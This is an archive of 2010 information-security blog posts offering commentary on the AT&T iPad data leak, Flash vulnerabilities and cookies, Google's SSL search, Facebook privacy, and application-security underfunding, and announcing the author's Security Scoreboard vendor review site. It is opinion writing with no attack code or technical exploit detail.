Thursday, June 10, 2010

iPad and the Illusion of Privacy

It's been a bad week for Apple. First the wifi choked at Steve Job's iPhone 4 demo at WWDC. And now Gawker has reported that AT&T inadvertently leaked the email addresses of 114,000 iPad purchasers.

It should come as no surprise that the culprit here is a web application vulnerability. According to a story on Slashdot, a web service that was supposed to provide an AJAX-type response within AT&T's web apps was left exposed externally. Oops.

A lot of big name people are going to be pissed off. The celebrities on the list are not going to be happy about having their email address in the papers. And public officials who expensed the iPad will (or at least should) have some serious explaining to do as to why the taxpayer needs to subsidize their new toy.

Email addresses can be changed. But the leak also exposed something called the ICC-ID, a number that uniquely identifies a device's SIM card.

At the time of writing (night time EST 6/9) there is still no official announcement on what is going to happen with the leaked identifiers. My guess is that they can't be reliably changed without a manual recall. This raises privacy concerns for the affected users, since ICC-IDs are relatively liberally shared during the course of network communications.

But in the end it doesn't really matter. Using an iPad or an iPhone already binds your personal information to your web traffic in a much deeper way than your old fashioned Mac or PC. After all, most iPhones are full of apps that tie your real actual personal data - your name, credit card, address, etc to your device. iTunes works the same way. And unlike a full blown computer, iPhones and iPads afford very little GUI control of what is happening in the background. You could of course gain control through jail breaking. But that's not the MO of 99% of users, and violates the terms of service to boot.

I don't mean to justify the leak - users have a reasonable expectation that their personal information is not totally exposed for the world to see. But when you use an iPhone or iPad, you need to realize that your personal data is lurking in thinly veiled form in countless transaction and traffic logs. Although the 114,000 folks whose ICC-IDs are now public domain are slightly more at risk than the rest of us, it is not as though everyone else was operating in anonymity. The AT&T incident demonstrates that on rigid mobile platforms everyone's traffic is just one badly configured web service away from exposure.

It is amazing how quickly mobile communications has gone from the most secure to the least anonymous form of communication. Mobile security has a special place in my heart since the days I served as one of the dozen-odd members of the ETSI Secure Algorithm Group of Experts that standardized the GSM and UMTS encryption algorithms in the first half of the last decade. Back then it was easy - security derived from cryptography, and mobile Internet usage was barely getting off the ground. Today the underlying strength of the mobile cryptographic algorithms is almost irrelevant to most practical attacks. And anonymity is essentially impossible to achieve on devices locked down by both the manufacturer and the operator.

With a brick and mortar PC that connects to networks the old fashioned way, there is a certain default anonymity that even non-technical users can achieve. On locked down mobile devices - where Steve Jobs decides what applications can run and how - a user's identity is at best protected by a myriad of minimalistic authentication mechanisms. For most users, it is worth trading robust privacy in the interest of a rich user experience. That's why millions of users (myself included) own iPhones. But it also means that when the inevitable data breaches occur, there is a lot more information potentially at risk.

Tuesday, June 8, 2010

Napera selling security at the Google Apps Marketplace

Napera networks announced yesterday the availability of what appears to be the first systems management application in the Google Apps Marketplace.

Google Apps Marketplace was launched in March of this year and is exactly what the name implies - a place to buy and install apps that integrate directly with Google Apps. Most of the 45 offerings currently listed in the Security and Compliance category are related to email security. This makes sense since email is the most popular Google Apps product.

Napera's PC Security Informer is trailblazing as the first security management offering in the Google Apps Marketplace (there are of course plenty of competing cloud security management offerings like for example Shavlik PatchCloud).

Does buying security management from the Google Apps Marketplace make sense?

Luckily for Napera, the usual cloud security FUD will not hold much water with its potential Google Apps Marketplace customers. The small and medium sized businesses that are the target market for Napera's PC Security Informer have already moved big chunks of their infrastructure to the cloud. Since the data is already in the cloud, there is no reason that the security to protect that data shouldn't be in the cloud as well.

The bigger issue for most businesses will be business control, customization, privacy policies, and SLA's. Moving apps to a platform-as-a-service infrastructure is scary from a can-I-get-someone-on-the-phone-when-the-^%&$^-hits-the-fan perspective. And for applications deployed within Google Apps, there are multiple vendors to deal with. When you use a cloud-built-on-a-cloud service like Napera PC Security Informer, you are dependent on both Napera and Google for everything to run smoothly.

The litmus test for the success of any app in the Google Apps Marketplace is whether the integration advantages outweigh the lock-in. The biggest competition for Google Apps Marketplace security products will come from competing hosted solutions. With third party hosted solutions, what you lose in Google Apps integration might be gained back in control and peace of mind.

A challenge for Napera in driving adoption of the PC Security Informer is the nature of the Google Apps customer base. With 25 million users spread over 2 million businesses, the typical Google Apps customer is a ten-guys-working-virtually type of company. Those organizations are not in the market for systems management. Many of the larger companies using Google Apps are still dipping their toes in the water. Those companies are unlikely to realize much advantage in the tight integration with the rest of their Google Apps domain that is the main value added of the app approach.

I haven't used the product, but it would certainly be interesting to hear from someone who has. Which brings me to a plug for Security Scoreboard, the vendor review site for the security community. If you are a current customer of Napera Networks, please share your experiences on Security Scoreboard and help the rest of the community evaluate this vendor.

Monday, June 7, 2010

Flash Security Under the Microscope

On the heels of Apple's very public tussle with Adobe over Flash support on the iPad, Adobe announced a "critical vulnerability" in Flash on Friday.

Vulnerability announcements happen all the time. For better or worse, the nature of today's software industry is to build first and repair later. But its been months since Flash experienced a security issue of this scope. And the timing is not good for Adobe, as Steve Jobs specifically mentioned Flash security issues in his "Thoughts on Flash" manifesto in April. With the major media players deciding what graphics and animation standards to support, Flash is under the microscope.

I don't think security usually determines winners and losers in the mass market/desktop environment. But there are rare occasions when the cumulative perception of security vulnerabilities coupled with lingering privacy issues can form a tipping point in the fortunes of a technical standard or company. Many companies are immune to this phenomena due to a lack of alternatives (for all the user outrage, Facebook is not about to be upended by fledgling alternatives like Diaspora anytime soon). But with HTML5 and other open web based standards based offering competing functionality, a series of badly handled security vulnerabilities would not augur well for the future of Flash.

Incomprehensible warnings

Miscommunicating vulnerabilities like the one announced on Friday can fall into this straw-that-broke-the-camel's-back. At the time of writing (Saturday night June 5th) the Adobe announcement does not make clear that all users running current versions are vulnerable and that there is no available fix. Instead, Adobe published that anyone running Flash version 10.0.45.2 or earlier is at risk. Since there is no version 10.0.45.3, that basically means that by default everyone is potentially vulnerable. Since most non-RainMan users do not have the version numbers of their installed programs memorized, this should have been more explicitly spelled out in plain English. A more technical explanation could have been included to parse out which installations exactly are at risk.

But even more troubling for the average user is the lack of a viable fix. Adobe has announced that this vulnerability is being exploited in the wild (again an incomprehensible term for most users…). There appears to be no available patch for the Flash vulnerability. And for the accompanying Reader and Acrobat vulnerabilities the solution is to remove the authplay.dll component that ships with the product. How many users know what a dll is?

Of course Adobe isn't alone in producing vulnerability announcements that are inactionable for most users. And this announcement is far from the worst. My unscientific thumb-in-the-wind estimate would give this a B or B- for clarity on a weighted curve with other major software vendors. But even more problematic and potentially more damaging to Adobe's long term perch within everyone's browser is the lack of user control over Flash privacy settings.

Flash's privacy exception

Flash has long existed in its own little fiefdom on the desktop, immune to many of the privacy controls applied to browser plugins. But that situation could be ripe for change. When even Facebook's CEO - with the closest thing the planet has to a universal social network - is literally sweating up a storm over users' privacy concerns, more easily replaced plugins like Flash cannot continue indefinitely to fly under the radar.

Until now Flash has somehow gotten a free pass when it comes to user privacy. In response to user demand, all the major browsers include a private browsing mode that does not record cookies and generally does not leave digital fingerprints on the user's computer (earning it its more technical name, porn mode). But Flash doesn't play by this game. Most users are very surprised to learn that Flash cookies persist on their machines long after the user has diligently cleared caches, cookies, and even reset their browsers. The only clue for the average user is the seemingly mysterious way that programs like Pandora still remember them long after they thought they scrubbed their browser clean. Flash may have a webpage where users can theoretically manage their cookies, but I would guess that only a minuscule portion of users are even aware of its existence.

Regardless of whether you think Flash on a website is cool or just annoying, it's hard to get the full web experience without Flash and that's why its installed on 99% of browsers. If Flash were to lose its ubiquity the transition to competing standards could snowball. With so little information available about the latest vulnerability, it is difficult to know whether it is the result of overzealous feature integration at the price of security. But as the ubiquitous incumbent in the web multimedia war of 2010, Flash will be judged - fairly or unfairly - to a higher standard than some of its emerging competitors.

Tuesday, May 25, 2010

Google Secure Search and Security Overkill

Google announced on Friday the availability of a beta version of its secure search.

Secure search? Well, kind of. Google, of course, still retains all your search data. But users will now have the option of searching over an SSL connection. Just type https instead of http in the Google URL and your searches are safe from prying eyes, Google and your desktop notwithstanding.

The rushed timing of the latest announcement is no coincidence. Google has been in some serious hot water over the last few weeks for gathering data from insecure wifi connections using StreetView. Unlike previous Google privacy $@#%-ups, StreetView wifi-gate has users, and especially governments, genuinely annoyed. A big American company driving by in a van and kinda sorta intercepting wifi traffic understandably rubs a lot of folks the wrong way, especially in Europe.

There is a certain delicious irony here. Google gets busted for spying on unencrypted wifi connections, and responds by offering encrypted search. Google is basically saying that you had better think about encrypting your search results, because there are a lot of crazy folks out there who might be trying to listen in. Heck, even we might be accidentally listening in!

Ironic or not, at least this makes some sense. Last week I wrote about Facebook trying to address a growing privacy uproar by offering a totally unrelated security option. While offering a rare mea culpa for the wifi snooping, with secure search Google is also not-so-subtly castigating users for their use of insecure connections. A bit like Toyota reminding users about the importance of seat belts...

[Since we're on the wifi topic, one quick digression - I don't believe for a minute that Google has any interest in spying on user wifi data. With so much data on so many users, the last thing the company needs is to physically go to users to get their information. I take at face value the claim that a "programming error" was responsible for the extraneous data collection. Unlike Facebook, Google has a deeper well of general public sympathy to draw on and my theory is that the public, if not necessarily the legal, aspects of this incident will quickly blow over.]

But back to secure search, which has been in the works for a while and is much more than a response to the wifi incident. Cynics say that secure search is just a ploy by Google to keep precious search data from the ISPs. To me that doesn't hold much water. Secure search will never comprise more than a tiny slice of overall Google searches unless it is the default. And I don't see that happening any time soon.

At the risk of overestimating the importance of the security profession, I would argue that one of the main motivations behind the new service is Google's interest in placating the security purists within organizations considering its enterprise services. As the biggest cloud service provider in the world, Google's entire corporate future is tied into trust and security in web applications. If Google wants to convince users to ditch desktop applications and behind-the-firewall servers in favor of its web-centered universe, it needs to convince enterprises that it takes security uber-seriously. By being the first major player to offer to secure pre-authentication search data, Google casts itself as a cutting edge provider of secure cloud services.

But does secure search fulfill an actual security function that justifies its cost? Or is it a case of security overkill meets security theatre?

Searching away from prying eyes

Let's start with what Google searches over https achieve. By encrypting traffic, search traffic will be safe from network sniffers.

Here's my best stab at a list of people/entities you might not want seeing your Google searches:

1. Your husband/wife/roommate/parents
2. Your employer
3. The random sys admin at your Internet cafe, university, etc.
4. Your government or ISP

Secure search does nothing for (1). In case (2), your employer is probably not terminating SSL connections, but they may very well be, so you can't really count on your searches being secure. With (4), your government or ISP have enough information on you (like your entire traffic history) that your search history becomes largely irrelevant.

That leaves (3). The only real advantage of secure search is protecting you in random networks you might be connecting to. This seems like a pretty limited use case. And anyone sufficiently security conscious is already tunneling their traffic on public networks rendering moot the privacy advantage of secure search.

How did you get here?

There is one big privacy advantage to secure search - referrer headers are no longer passed, so the web page you are landing on no longer knows how you got there. The vast majority of Internet users do not realize a simple fact that is obvious to most of the security minded readers of this blog. When you search "furry animals" on Google, and land on www.myfurryanimals.com, the webmaster of the latter sees that you landed there by searching "furry animals". The entire web analytics industry is built around this fact.

But you don't need SSL to disable referrer headers. And besides, if someone is so concerned about privacy, they might be better off getting an anonymous proxy. Proxied traffic usually uses encrypted protocols, so at that point using secure search becomes superfluous.

I have no idea what the performance or functionality hit on secure search will be, but for now I don't see the numbers adding up in favor of the service. Searching on the beta Google secure search site seems slightly slower than regular http Google, (although admittedly from the confines of a crowded New York cafe on a Sunday evening). So here's my back-of-the-napkin calculation: I probably do 100 Google searches a day. If each of those is 1 second slower (and I'm just making up the numbers here), is it really worth an extra 1min and 40 seconds of my time every day to hide my Google search history from a hypothetical person who might want to look at it?

The large majority of users have so many toolbars, widgets, and logged in applications running at the same time that the entire concept of SSL encrypting their search traffic is ridiculous. But even for privacy conscious users this seems like one proverbial bridge too far. Secure search might give users a false sense of privacy with little tangible benefit.

An interesting project by the Electroric Freedom Foundation called Panopticlick shows that your browser basically provides servers enough information to be uniquely identifiable. With all the fonts, plugins, and other settings your browser has, even with an anonymous proxy a website can identify you as a return visitor. For the average user, online privacy is a bit of a heads they win, tail you lose proposition. No matter what measures they are taking, it turns out that they are still traceable online.

All this certainly should't be construed as meaning that secure search is useless. Whatever one thinks of Google's privacy policies, they do offer a rich set of user security configuration options. With options like tying password reset to a mobile number, showing the last IP addresses that logged into a Google Account, and default SSL for many enterprise applications, Google offers a significant arsenal of security options that is more robust than many of its competitors. I'm just not sure if secure search adds much to this portfolio.

Friday, May 21, 2010

Facebook and Security Minimalism

Facebook can't seem to catch a break. Just this Wednesday an XSRF bug was announced that gave access to birthdates users had designated as private.

Not that Facebook users care. I would bet dollars to proverbial donuts that no more than 0.01% of Facebook users has ever heard of XSRF. And more importantly, I would bet that almost none of them has really suffered from these vulnerabilities. Bad security in social networks is a non-story. Lax privacy policies, on the other hand, are much more in your face. No user is going to notice an insecure version of Python running on your webserver. But share their data with unauthorized contacts and the same user might go beserk.

User apathy notwithstanding, Facebook is making some half-hearted attempts to calm the masses. The company announced last Thursday the ability to limit the devices from which an account can be accessed. But this attempt to soothe the raging Facebook villagers with sharpened pitchforks is misdirected. Users are concerned about who Facebook is sharing their information with, not how. Device authentication - a poor man's security control at the best of times - is an unnecessary inconvenience to the vast majority of users and an insufficient safety control for the truly paranoid.

Facebook are not fools of course. You don't build a business that engages every tenth adult on the planet without honing a pretty good sense for which way the wind is blowing. The company realizes that it is under no obligation to provide any real security controls to its users. Providing window dressing security such as device authentication is a good way to appear conscientious to a public that tends to conflate security with privacy. And in any case, the risk that device authentication addresses - preventing User A from logging in as User B - is the one area where Facebook and its users have a common interest.

So Facebook's mission is not entirely at odds with security. Facebook has an interest in providing application security insofar as it does not impede its vision of becoming the web's authoritative social platform (more on that in a bit). But beyond that, why would Facebook provide security that involves substantial resources or limits its collaborative abilities? Facebook may throw its users a security bone when in comes on the cheap, but the company is under no obligation to provide anything beefier.

Really? Here is a simple fact most security folks won't like - unless you are in a regulated industry you are under almost no specific obligation to offer secure web applications. Unlike privacy regulations, this statement is true across all major jurisdictions. Laws will limit who you can share data with, and in some cases like children whether information can be collected to begin with. But they impose virtually no requirements on small businesses on how or even whether they need to secure their data.

This means that anybody can fire up a web application and start collecting, storing, and processing data that may or may not be sensitive to its owner. And they can do this while being under almost no legal or business requirement to provide adequate security.

With hosting costs approaching zero and development frameworks hiding the uglier layers of the stack, this means that any old schmo can be in business in no time. Just like you can blog on Blogger without touching any code, you can now build some pretty impressive quasi-professional web apps without touching any real code. Millions of people have done exactly that.

But what about big apps? Surely the ubiquitous brand name web applications are subject to some sort of control that two guys in their garage are not? Well, not really. The fact is that many web 2.0 apps that are in common enterprise use are probably not more than 5 or 10 guys. They may look like big businesses, but the beauty of the Internet is the ability for small organizations to amplify their presence and take on the trappings of the big boys.

Today there are gazillions of sites out there that will do anything from storing files to reformatting reports that are operating with almost zero intentional application security. And its not just small or medium sized businesses. Even the big players are, at the end of the day, only subject to restriction on who they can share data with. Having mostly evolved from small start-up operations, they take an understandably minimalist approach to information security. Application security - in stark contrast to privacy - is basically a good faith effort.

The kerfuffle around Google's recent StreetView-wifi snafu is a good example of the priority of privacy over security. Apparently Google's StreetView had collected information from open wifi networks. Google has attracted a great deal of negative press and is facing numerous investigations in Germany and elsewhere for this. At the same time, the numerous security vulnerabilities that are frequently exposed at most large companies hardly register on the legal radar screen, and is certainly not something that will get investigated. You don't trigger an EU investigation by having too many bugs to patch in a given release or by using a vulnerable version of PHP.

The More Social, The Less Secure

That's not to say that security and privacy are totally unrelated in social networks. If Facebook wants to build a platform that others can plug into, it necessarily opens the application to vulnerabilities. A very good example of this is the recent hiccup with Yelp. Facebook's Instant Personalization exposed users to a cross-site-scripting vulnerability on Yelp that could harvest user data. Without the Yelp integration, this vulnerability would never have happened.

When it comes to social networks, there is no free security lunch. Collaborative services are by definition less secure. Facebook is meant to be collaborative and thus can never offer the same level of security as a more gated service. This is the same reason that Times Square cannot be secured in the same way an airport can. One is meant to be open and one is meant to be closed, or at least controlled. Although hundreds of security vendors may try to secure web 2.0 applications, robust security and social collaboration are ultimately opposing aims.

Of course there are numerous technological standards that are being built precisely to secure the web 2.0 world. The move to OAuth from BasicAuth (a transition that Twitter will be enforcing next month) is a good example. But from a business perspective, the raison d'etre of most social applications is the collaboration, not the security. When web services communicate, there is generally only one level of authentication required to reach the crown jewels. Unlike traditional applications, most web services only require one screw-up or misconfiguration to expose your data.

Social Media vs the Enterprise

This single-line-of-defense approach that most web 2.0 applications take is sufficient for most individual personal data. Your Facebook settings may limit photos of you drinking at a keg party from your work colleagues, but their accidental exposure is not such a big deal and is a risk most users are willing to assume. In our personal lives, there is no breach notification, limited personal financial liability, and a much lower expectation of due care. Even the recent mess-up exposing your friends' private chats on Facebook is probably met with a stuff-happens shrug by everyone not directly affected.

But enterprises should - in theory - be more cautious. Breaches can carry real costs, financial liability is more substantial, and there are often contractual obligations to provide security. Indeed while there might be no affirmative legal obligation for application providers to provide security, customers may very well be prevented from using their services if there is insufficient security. After all, most enterprises that deal in personal data are under some form of contractual obligation to reasonably protect that data.

Will this raise the bar for small providers of cloud services? Unlikely. As I have frequently ranted about in the past, in non-regulated industries these obligations usually refer to some dinosaur-like provisions about SSL and biometric readers at server room entrances. Unless a company is truly conscientious about applying the meaning of due and reasonable care, there are practically no legal or contractual security requirements to which web applications are subject. (This is of course not true of heavily regulated industries like finance, but most corporations are operating in much more loosely regulated spaces).

Many enterprises are driving full steam ahead with the integration of minimally secured third party web applications into the enterprise. The transition from walled-off silo to full member of the application ecosystem is well underway. We may not be in a Jericho-Forum world of perimeterless utopia, but we are in the awkward teenage state of integrating our IT environment with hundreds of smaller companies - through APIs, SDKs, and the like.

Much like real life, digital hookups put enterprises at risk - you no longer have to worry just about who you are with, but everyone they have been with and will be with in the future. And just like real life, the process of evaluating the safety of a potential application hookup is largely heuristic. With an increasingly promiscuous digital environment, we lose the ability to do a full battery of tests on each potential partner (and belated apologies for the lame analogy).

For individuals, the risks of collaborative web services are far outweighed by the benefits. That's the reason that Facebook has 400 million users and why thousands of popular applications with only the thinnest veneer of authentication thrive. This risk calculus will also hold for many enterprises, both large and small. For more security heavy environments, however, fundamental changes will be needed. For some environments it will take a lot more than device authentication to make today's handy web applications ready for enterprise prime time.

Tuesday, April 27, 2010

Application Security Underfunded

Imperva and WhiteHat just came out with a report on security spending and resource allocation (registration required). This report is a must-read for anyone who is in charge of security budgets.

The basic gist of the report is that application security is not getting it's rightful share of the security spending pie. This is perhaps an unsurprising conclusion for a study sponsored by web application security vendors, but the real mystery is why the wider security industry is not talking more about this undeniable and perplexing spending imbalance in the security industry. Simply put, most threats are web based, but most security budgets are not. Why?

Here are a few reasons I can think of for the spending imbalance:
  1. Decision makers are unaware of the relative risks.
  2. Inertia
  3. Legal and regulatory requirements overlook web app security
  4. Perception that web application security cannot be solved by throwing money or resources at it.
All these factors feed into one another but there is one other factor at play that is internal to the security industry itself. By and large, the same security standards have traditionally been applied to an incredibly broad swath of companies. Rather than raising the standard for everyone, this approach has had the de facto effect of exempting certain companies from what they perceive to be irrelevant requirements. This in turn drags the entire market down to the lowest common denominator. By using the same hammer to hit all nails, the security industry has inadvertently generated a "security race to the bottom".

One Size Fits None


Some companies operate in highly regulated and highly sensitive environments where security is not up for debate. Let's call this the Fort Knox zone. In the Fort Knox zone, web application security is governed by detailed SLAs on remediating vulnerabilities and applying secure development processes. In this zone, the security of the web application is considered an inherent part of the finished product or service. Everybody thinks and breathes security. These are the big banks and the three letter agencies amongst others.

Then there's the Pragmatic zone, where security matters, but where business decisions are constantly being made to balance security against price, convenience, and functionality. Most businesses fit in the Pragmatic zone even though they might deal with sensitive data. Online health records is one example. For most people, the risk that a random hacker might find out their medical allergies pales in comparison to the risk that in an emergency a doctor might be unaware of those allergies. In the Pragmatic zone, security takes a back seat to functionality, but basic security remains highly desirable.

Finally there is the Whatever zone - a place where basically everything you use is at your own risk. This is the guy who runs a cool web service from his parents' basement that allows you to see when you and your buddies are both within stumbling distance of the same pub. In the Whatever zone, there is no guarantee - and often no mention - of security. It's not that security is trumped by other considerations. It simply was never really a consideration to begin with. And if you don't like it, don't use it.

The Failed Quest for the Esperanto of Security

Today's security industry speaks largely in the language of the Fort Knox zone. "Critical" and "severe" vulnerabilities are presented as something that must be fixed within as short a time as possible. But most businesses are actually graduates of the Whatever zone that are today in the Pragmatic zone. The shrill tone of vulnerability disclosures coupled with its frequently monolithic approach produces tone deaf customers and businesses.

In other words, the real problem is not that there are so many insecure apps out there, but rather that as an industry we set a bar that is both unattainable and inappropriate for many applications. Consider the very recently published OWASP Top 10 web application security risks. Many companies and many security folks view this list as an all-or-nothing proposition (although OWASP makes clear that it isn't). There is no inherent reason that all web applications need to be immune to all these threats. It just takes too much effort with far too little return. And this isn't even counting the opportunity cost of fixing security vulnerabilities.

The specific metrics of the WhiteHat-Imperva report underscore why the absolute approach does not work. Take for example the 38% of respondents who believe that 20 hours of developer time are needed to fix a vulnerability. Regardless of whether this figure is perception or reality, there is no way that a small operation is going to budget 20 hours to fix a seemingly obscure vulnerability when that time could be used to fix a visible bug or build a new feature. The return for spending lots of extra money to truly lock down most apps is just not there - not in the customer recognition, not in improved regulatory compliance, and often not even in a reduction in damaging security incidents (or at least not in a way that is readily measurable for organizations with limited resources).

So it shouldn't really surprise us that vulnerabilities aren't getting fixed. In most companies if the website doesn’t actually work there is hell to pay. But if there is an unfixed vulnerability almost no one knows or cares.

The User Has Spoken (while logging in over http)

This user indifference runs deep. I never cease to be amazed by the number of early and even mid-stage start-ups that don’t have login over https. From a security, or even a marketing, perspective secure login seems like a no-brainer – certificates are relatively easy to install and it is one of the few – perhaps the only – security mechanism that almost every single end user is on the lookout for. So it is very telling that many start-ups do not consider it worth investing even the slight pain-in-the-ass that using certificates introduces.

As security professionals this may seem jarring, but these start-ups know their business better than anyone else. They have figured out a well known secret of today's Internet -

Much of the Internet is pretty much useless if you follow security rules.

OK, that’s a bit harsh. But conventional security wisdom does not jibe with having fun or even getting things done online. There are just too many things you miss out on online if you actually abide by all the security rules that the purists preach. (Here's a simple list for starters - storing passwords on your iPhone, storing passwords in your browser, giving up your passwords for application integration, simultaneously logging on to numerous applications, and the list goes on).

So as an end user, you basically have a choice – seriously handicap your use of the Internet, or take your chances with a half-hearted that's-what-everyone-does attempt to minimize risk (aka anti-virus). The vast majority of end-users have opted for the latter. Or put differently, end users are fundamentally happy with the Whatever zone of security.

The low bar from home to enterprise

Most companies start operations in much the same way - in the Whatever zone of security. They need to push something out fast and get to market with the bare number of features. And the barely working mentality applies to security just as much as anything else.

It's here that the seeds of the specific spending disparity described in the Imperva-WhiteHat study first come to light. Application security comes with real project risk costs. This is in stark contrast to network security – you can secure your network layer fairly easily without risking screwing up your app. Compare the pain of setting up a WAF with the relative ease of setting up a firewall. When a small company needs to choose how to answer the security checkbox that most customers will never look beyond, the choice is clear. And so the imbalance is born - Network security 1, Application Security 0.

Of course start-ups start using the services of other start-ups, and before you know it you have a growing company within a relatively large enterprise ecosystem where everyone is using consumer-grade security without real threat analysis. It is this transition to the enterprise level where in theory the threat analysis should mature and security measures fundamentally reassessed. By that point though, the ship has gotten big and bulky and reversing course is no longer easy.

So often as companies go from the Whatever zone to the Pragmatic zone, they sweep app sec issues under the rug and hope (often correctly) that no one is going to notice or care. Today, too many enterprises are treating web application vulnerabilities as if they were still in the Whatever zone - and then if someone asks about security, they can proudly answer glad-you-asked, look-at-our-firewall. The details of the Imperva-WhiteHat report (and if you have made it this far in the post, you should really read the full report) reflect this - most security professionals report an internal culture that is either cavalier or helpless about web application vulnerabilities.

How is this going to change? If recent history is any judge, regulations and contracts will either break or re-enforce the current security spending imbalance. The current trend is towards the latter. At the risk of sounding like a broken record, I’ll mention again that even relatively recent pieces of legislation and standards (PCI, Massachusetts data security regulation, and for that matter most RFPs) completely gloss over application security. For reasons that I don't fully understand, the PCI Prioritized Approach puts most network security issues ahead of application security issues. And now Washington State has adopted a PCI-based law. This certainly doesn't bode well for correcting security spending imbalances any time soon.

Sunday, January 31, 2010

Security Scoreboard is Live!

I am very excited to announce the launch this week of Security Scoreboard - an online resource for researching and reviewing information security vendors. Security Scoreboard features over 600 vendors and aims to become a valuable resource for CISOs, CIOs, system administrators, and anyone who is in the market for information security products and services.

Why Security Scoreboard? As an information security executive at a mid-size company in New York City, I constantly face the challenge of trying to quickly identify and assess the security vendors who offer solutions in a given space. While there is a ton of available vendor content - webinars, press releases, whitepapers, etc - I have always found one vital resource to be missing in the purchase process. Until now there hasn't been one convenient and objective place to see side-by-side profiles of all the vendors addressing a specific security challenge. Security Scoreboard fills this gap by providing a starting point to get oriented about all available solutions before doing a deep dive on those vendors that seem the most promising.

CENTRALIZING RELEVANT INFORMATION

Let's take the example of a security manager looking for an enterprise privileged access management solution. Searching online will lead him or her to some of the larger players. But finding a comprehensive online list of all the players in this field is surprisingly hard, and involves plowing through an overwhelming amount of irrelevant information.

And once the main players are identified, finding basic objective information on each vendor can be tough. The average vendor publishes numerous press releases that then get picked up and replicated on multiple other sites. Independent opinions and information about the vendor get buried at the bottom of online search results.

That's where Security Scoreboard fits in the picture. Security Scoreboard is meant as a time saver - a quick way for security consumers to orient themselves and separate the wheat from the informational chaff.

This is especially useful for buyers in the SMB market. One of the things that strikes me every time I go to conferences like RSA is the sheer number of security vendors with unique and innovative approaches to various security challenges. At the same time, there has been a distinct lack of freely available resources for researching these vendors. Potential buyers lack an easy way to put a vendor in context, research its competitors, and objectively assess whether a vendor's solution will work for them.

The information imbalance is less of a problem for security pros in larger companies that have access to analyst and other services to research the competing claims of a large number of vendors. But security managers and CISOs at smaller companies usually do not have extensive access to such services. For them, even identifying who the main players are in a space can be a time consuming process. Security Scoreboard is of particular use for these often-overlooked consumers of IT security.

CUSTOMER REVIEWS

Security Scoreboard provides more than just a comprehensive directory of security vendors. Users can also leave reviews describing their good or bad experiences with security vendors they have worked with. Of course, like any public review site, there is no reliable way to verify that online reviews correspond to actual customers. But security pros by nature are sophisticated enough to process information accordingly and to spot obvious attempts to game the system.

RESOURCES FOR VENDORS

Most information security vendors will find their company listed with its own company page on Security Scoreboard. Vendors who are not yet listed can submit a request and will be added if they meet the basic requirements (a focus on information security and an active market presence). There is also a form vendors can fill out to get free monthly Google Analytics reports showing the search terms that are leading users to their company page.

Security Scoreboard will also be offering vendors the ability to convert their page to a "premium page" and expand on the very short summary currently in place for each company. This will give vendors who want to spruce up their company page an opportunity to get their message across next to the user reviews and other links related to their company. In keeping with the transparency that is at the heart of Security Scoreboard, this structure will be clearly described on the website.

To celebrate our launch, Security Scoreboard will be sponsoring some great prizes at the Security Podcasters and Bloggers Meetup at ShmooCon this coming weekend in DC. Come by and say hello if you are going to be at the event.